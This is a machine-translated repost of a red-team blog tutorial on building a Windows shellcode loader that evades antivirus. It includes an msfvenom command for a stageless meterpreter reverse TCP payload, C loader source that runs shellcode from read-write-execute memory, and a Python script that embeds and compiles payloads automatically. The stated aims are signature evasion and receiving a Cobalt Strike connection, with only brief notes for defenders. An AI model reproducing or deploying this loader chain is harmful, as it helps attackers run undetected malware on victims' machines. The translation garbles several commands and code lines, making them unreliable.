Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to use the general Shellcode loader, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.

Shellcode loader is a basic evasion technology. Although shellcode loaders usually facilitate the initial execution of payload, heuristic detection methods can still mark other aspects and behaviors of payload. For example, many security products may detect them when they are in memory or detect specific network traffic as malicious. We will look at some post-development frameworks suitable for use with loaders and how to embed other types of binaries (such as .NET and compiled PE binaries).

The first part of the blog series will introduce the basics of using Shellcode for post-development of payload. In the second part, we will implement other functions for the loader and look at some of the advantages and disadvantages of some features. Because we use shellcode to avoid signature-based detection, it is important to limit the possibility that security solutions create initiator signatures. Binary obfuscation is a potential solution to avoid signature-based detection, and we will write a python script to automate the generation and obfuscation of the loader.

Introduction to Shellcode

In an attack, we need to perform some shellcode on the target. Post-development frameworks such as Metasploit and Cobalt Strike have their own shellcode, but the payload in these frameworks has a high detection rate because it is widely used. However, they provide some functions that allow us to play freely. In addition, using an easy-to-detect shellcode will help us determine whether the loader's avoidance function is working properly during development.

Metasploit and Cobalt Strike provide both staged and stageless payload. When using both staged's payload, the shellcode is smaller, resulting in smaller launcher binaries. However, compared with stageless payload, both staged's payload is more likely to be found. This may be because network traffic from the server is marked as malicious, or because the method used by the attacker to execute the final payload is detected. In this blog, we will use stageless payload to circumvent, because we don't care about detection before loading payload into memory. For more information about both staged and stageless payload, check out the blog article that delves into load OJ Reeves without load meters.

The figure above shows how to use msfvenom to generate the original shellcode. We specify the IP and port of the payload connection and save the output to a file. When working with large files, this head command can only be used to print the first character. Here, we use this-c parameter to output only the first 100 characters, which we can then pipe through xxd to get a hexadecimal dump of shellcode.

Msfvenom-p windows/meterpreter_reverse_tcp LHOST=IP LPORT=port > stageless_meterpreter.rawhead-c 100 stageless_meterpreter.raw | xxd

TheWover's Donut project can be used to create a location-independent shellcode that can load .NET, PE, and DLL files. This tool will allow us to extend the availability of the loader by supporting other payload types. With Donut, we can easily generate shellcode for tools such as Mimikatz,Safetykatz and Seatbelt.

Analysis of Shellcode Loader

The shellcode loader is written in C, and we will use Python to automatically insert shellcode and compile binaries. To compile the Windows executable on Linux, we will use the MinGW compiler.

# include # include using namespace std;int main () {char shellcode [] = "paste shellcode here"; LPVOID lpAlloc = VirtualAlloc (0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy (lpAlloc, shellcode, sizeof shellcode); ((void (*) () lpAlloc) (); return 0;}

Here, we can see the source code for the standard shellcode loader. In this blog series, we will add functionality to the loader. It consists of four main parts. First, shellcode is defined as a char variable, but the current source code has a placeholder string that will be automatically modified later. Then, we use VirtualAlloc to allocate memory for shellcode. It is important to note that this memory page currently has read, write, and execute permissions. After that, use memcpy to move the shellcode to the newly allocated memory page. Finally, execute shellcode.

We can use Msfvenom,Cobalt Strike and Donut to generate a shellcode that consists of raw bytes. Because we want to embed payload in the source file; we have to format the shellcode into a hexadecimal representation. You can use the manual solution hexdump, but we will perform this step automatically in Python later.

The hexdump command reads the original shellcode file and returns it in hexadecimal format, which can be embedded in the source code. In the figure above, we saved the output to a file and then used the head command to illustrate the returned hexadecimal format hexdump.

Hexdump-v-e'"\\" x "1max 1" x "'raw.bin > > hex_formathead-c 100 hex_format

If # replace_me# replaces the string in the source file with shellcode in hexadecimal format, it can be compiled using MinGW.

I686murw64murmingw32Mutual + shellcode_launcher.cpp-o launcher.exe Automation

Although we can format the shellcode and insert it manually into the source file, we will write a short Python script to automate this process. The Python script will require three file operations. It must read the original shellcode file, read the source file, then write the formatted source code to the file, and then compile it into the final binary file.

Import binasciiimport argparseimport subprocessimport osdef main (p_args): # Read source template with open ("launcher_template.cpp", "r") as input_template: source_template = input_template.read () # Read input payload with open (p_args.input "rb") as input_shellcode: raw_shellcode = input_shellcode.read () # Convert raw binary to formatted hex hex_data = binascii.hexlify (raw_shellcode). Decode () hex_file_content = r "\ x" + r "\ x" .jo in (hex_ data [n: Nation2] for n in range (0, len (hex_data), 2)) # Insert the shellcode into the source code output_file = source_template.replace ("# replace_me#" Hex_file_content) # Write our formatted source file with open ("compile_me.cpp" "w") as output_handle: output_handle.write (output_file) # Specify our compiler arguements compiler_args = [] compiler_args.append ("i686 compiler_args.append ("-o ") if len (p_args.output) > 0: compiler_args.append (p_args.output) else : compiler_args.append ("shellcode_launcher.exe") # Compile the formatted source file subprocess.run (compiler_args) # Delete the formatted source file after it has been compiled os.remove ("compile_me.cpp") if _ _ name__ = "_ _ main__": parser = argparse.ArgumentParser (description='Protect your implants') parser.add_argument ("--input" Help= "Input file. Raw shellcode ", type=str, required=True) parser.add_argument ("-- output ", help=" Specify file output ", type=str, default=") args = parser.parse_args () main (args)

We use argparse to determine the input file. By using the binascii library, we can convert the original shellcode to hexadecimal without using the hexdump command. Currently, the path to the source template file is hard-coded into the python script, but it can be easily modified to allow users to choose between different templates using the argparse library. In addition, we can automatically compile the newly formatted source file and then delete it after compiling the final binaries.

Use x32dbg to analyze the loader

If we run the executable in the debugger, we can examine how to execute shellcode.

In the figure above, we can see what happens when shellcode is copied to the allocated memory page. When memcpy is then called, the address of the shellcode goes from the stack to the mobile EAX register.

If we look at the value EAX; in now, we can find the address where shellcode is located.

Once we have the address, we can use the memory Mapping tag in x32dbg to find the memory page. As shown in the figure above, memory pages containing shellcode currently have read, write, and execute permissions. Another thing to note is that we can see an additional memory page .rdata with the same size as payload. Because shellcode is embedded in unencrypted binaries, defenders will be able to detect malicious payloads without executing the launcher binaries.

Using x32dbg, the blue team can view the contents of the memory page and export it to a file for further analysis later. A useful note for blue team members is that even if the payload is encrypted before embedding the emitter binaries, the unencrypted payload can still be dumped by stepping through the debugger.

If we continue to step through, we can see that after call eax execution, the instruction pointer jumps to shellcode. Now, when we continue normally, we will receive a client connection in Cobalt Strike.

Thank you for reading this article carefully. I hope the article "how to use the General Shellcode Loader" shared by the editor will be helpful to everyone. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.